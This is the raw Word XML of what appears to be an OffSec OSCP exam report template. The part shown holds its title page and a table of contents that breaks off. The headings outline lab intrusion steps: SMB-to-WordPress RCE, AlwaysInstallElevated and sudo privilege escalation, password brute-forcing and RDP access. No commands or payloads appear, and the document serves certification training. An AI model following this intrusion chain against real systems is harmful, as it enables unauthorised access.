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_rels/document.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+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header1.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
  <Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>
  <Override PartName="/word/numbering.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.numbering+xml"/>
  <Override PartName="/word/footer3.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/media/image1.png" ContentType="image/png"/>
  <Override PartName="/word/media/image33.png" ContentType="image/png"/>
  <Override PartName="/word/media/image38.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image4.png" ContentType="image/png"/>
  <Override PartName="/word/media/image36.png" ContentType="image/png"/>
  <Override PartName="/word/media/image12.png" ContentType="image/png"/>
  <Override PartName="/word/media/image5.png" ContentType="image/png"/>
  <Override PartName="/word/media/image37.png" ContentType="image/png"/>
  <Override PartName="/word/media/image13.png" ContentType="image/png"/>
  <Override PartName="/word/media/image6.png" ContentType="image/png"/>
  <Override PartName="/word/media/image14.png" ContentType="image/png"/>
  <Override PartName="/word/media/image7.png" ContentType="image/png"/>
  <Override PartName="/word/media/image15.png" ContentType="image/png"/>
  <Override PartName="/word/media/image16.png" ContentType="image/png"/>
  <Override PartName="/word/media/image10.png" ContentType="image/png"/>
  <Override PartName="/word/media/image11.png" ContentType="image/png"/>
  <Override PartName="/word/media/image3.png" ContentType="image/png"/>
  <Override PartName="/word/media/image35.png" ContentType="image/png"/>
  <Override PartName="/word/media/image18.png" ContentType="image/png"/>
  <Override PartName="/word/media/image2.png" ContentType="image/png"/>
  <Override PartName="/word/media/image34.png" ContentType="image/png"/>
  <Override PartName="/word/media/image19.png" ContentType="image/png"/>
  <Override PartName="/word/media/image8.png" ContentType="image/png"/>
  <Override PartName="/word/media/image20.png" ContentType="image/png"/>
  <Override PartName="/word/media/image9.png" ContentType="image/png"/>
  <Override PartName="/word/media/image21.png" ContentType="image/png"/>
  <Override PartName="/word/media/image22.png" ContentType="image/png"/>
  <Override PartName="/word/media/image23.png" ContentType="image/png"/>
  <Override PartName="/word/media/image27.png" ContentType="image/png"/>
  <Override PartName="/word/media/image24.png" ContentType="image/png"/>
  <Override PartName="/word/media/image30.png" ContentType="image/png"/>
  <Override PartName="/word/media/image28.png" ContentType="image/png"/>
  <Override PartName="/word/media/image25.png" ContentType="image/png"/>
  <Override PartName="/word/media/image31.png" ContentType="image/png"/>
  <Override PartName="/word/media/image29.png" ContentType="image/png"/>
  <Override PartName="/word/media/image26.png" ContentType="image/png"/>
  <Override PartName="/word/media/image17.png" ContentType="image/png"/>
  <Override PartName="/word/media/image32.png" ContentType="image/png"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officedocument/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Title"/>
        <w:spacing w:before="200" w:after="240"/>
        <w:contextualSpacing w:val="false"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>OffSec Certified Professional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="200" w:after="240"/>
        <w:contextualSpacing w:val="false"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>Exam Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="600" w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v.2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>student@youremailaddress.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="480" w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>OSID: XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="600" w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2234565" cy="2234565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Image1" descr="A blue and purple circle with lines in it&#10;&#10;Description automatically generated"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 descr="A blue and purple circle with lines in it&#10;&#10;Description automatically generated" title=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2234565" cy="2234565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Copyright © 2024 OffSec Ltd. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner, including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written permission from OffSec.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="DejaVu Serif" w:cs="DejaVu Serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="DejaVu Serif" w:cs="DejaVu Serif" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="true"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:keepNext w:val="true"/>
            <w:keepLines/>
            <w:pageBreakBefore w:val="false"/>
            <w:widowControl/>
            <w:suppressAutoHyphens w:val="true"/>
            <w:overflowPunct w:val="false"/>
            <w:bidi w:val="0"/>
            <w:snapToGrid w:val="true"/>
            <w:spacing w:lineRule="auto" w:line="360" w:before="480" w:after="240"/>
            <w:jc w:val="start"/>
            <w:textAlignment w:val="baseline"/>
            <w:rPr>
              <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
              <w:b/>
              <w:bCs/>
              <w:i w:val="false"/>
              <w:i w:val="false"/>
              <w:iCs w:val="false"/>
              <w:caps w:val="false"/>
              <w:smallCaps w:val="false"/>
              <w:strike w:val="false"/>
              <w:dstrike w:val="false"/>
              <w:outline w:val="false"/>
              <w:emboss w:val="false"/>
              <w:imprint w:val="false"/>
              <w:color w:val="0F253F"/>
              <w:spacing w:val="0"/>
              <w:w w:val="100"/>
              <w:kern w:val="0"/>
              <w:position w:val="0"/>
              <w:sz w:val="32"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
              <w:em w:val="none"/>
              <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Cambria" w:cs="Cambria"/>
              <w:b/>
              <w:bCs/>
              <w:i w:val="false"/>
              <w:iCs w:val="false"/>
              <w:caps w:val="false"/>
              <w:smallCaps w:val="false"/>
              <w:strike w:val="false"/>
              <w:dstrike w:val="false"/>
              <w:outline w:val="false"/>
              <w:emboss w:val="false"/>
              <w:imprint w:val="false"/>
              <w:color w:val="0F253F"/>
              <w:spacing w:val="0"/>
              <w:w w:val="100"/>
              <w:kern w:val="0"/>
              <w:position w:val="0"/>
              <w:sz w:val="32"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
              <w:u w:val="none"/>
              <w:shd w:fill="auto" w:val="clear"/>
              <w:vertAlign w:val="baseline"/>
              <w:em w:val="none"/>
              <w:lang w:val="en-US" w:eastAsia="en-ZA" w:bidi="ar-SA"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="left" w:pos="440" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="__RefHeading___Toc5439_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>1</w:t>
              <w:tab/>
              <w:t>OffSec Certified Professional Exam Report</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5441_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>1.1</w:t>
              <w:tab/>
              <w:t>Introduction</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5443_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>1.2</w:t>
              <w:tab/>
              <w:t>Objective</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5445_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>1.3</w:t>
              <w:tab/>
              <w:t>Requirements</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="left" w:pos="440" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5447_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2</w:t>
              <w:tab/>
              <w:t>High-Level Summary</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5449_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2.1</w:t>
              <w:tab/>
              <w:t>Recommendations</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="left" w:pos="440" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5451_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3</w:t>
              <w:tab/>
              <w:t>Methodologies</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5453_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.1</w:t>
              <w:tab/>
              <w:t>Information Gathering</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5455_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.2</w:t>
              <w:tab/>
              <w:t>Service Enumeration</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5457_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.3</w:t>
              <w:tab/>
              <w:t>Penetration</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5459_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.4</w:t>
              <w:tab/>
              <w:t>Maintaining Access</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5461_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>3.5</w:t>
              <w:tab/>
              <w:t>House Cleaning</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="left" w:pos="440" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5463_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4</w:t>
              <w:tab/>
              <w:t>Independent Challenges</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5465_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1</w:t>
              <w:tab/>
              <w:t>Target #1 – 192.168.232.55</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5498_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1.1</w:t>
              <w:tab/>
              <w:t>Initial Access – Anonymous SMB share leads to Wordpress RCE</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5469_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1.2</w:t>
              <w:tab/>
              <w:t>Service Enumeration</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5500_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1.3</w:t>
              <w:tab/>
              <w:t>Initial Access – SMB share to Wordpress RCE</w:t>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5502_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1.4</w:t>
              <w:tab/>
              <w:t>Privilege Escalation - AlwaysInstallElevated</w:t>
              <w:tab/>
              <w:t>16</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5504_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>4.1.5</w:t>
              <w:tab/>
              <w:t>Post Exploitation</w:t>
              <w:tab/>
              <w:t>19</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="left" w:pos="440" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5471_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5</w:t>
              <w:tab/>
              <w:t>Active Directory Set</w:t>
              <w:tab/>
              <w:t>20</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5473_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.1</w:t>
              <w:tab/>
              <w:t>Ajla – 10.4.4.10</w:t>
              <w:tab/>
              <w:t>20</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5506_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.1.1</w:t>
              <w:tab/>
              <w:t>Initial Access – Password Brute-Forcing</w:t>
              <w:tab/>
              <w:t>20</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5508_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.1.2</w:t>
              <w:tab/>
              <w:t>Privilege Escalation – Sudo groupVulnerability</w:t>
              <w:tab/>
              <w:t>21</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5479_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.1.3</w:t>
              <w:tab/>
              <w:t>Post-Exploitation</w:t>
              <w:tab/>
              <w:t>22</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5481_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.2</w:t>
              <w:tab/>
              <w:t>Poultry – 10.5.5.20</w:t>
              <w:tab/>
              <w:t>23</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5483_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.2.1</w:t>
              <w:tab/>
              <w:t>Initial Access – RDP login</w:t>
              <w:tab/>
              <w:t>23</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
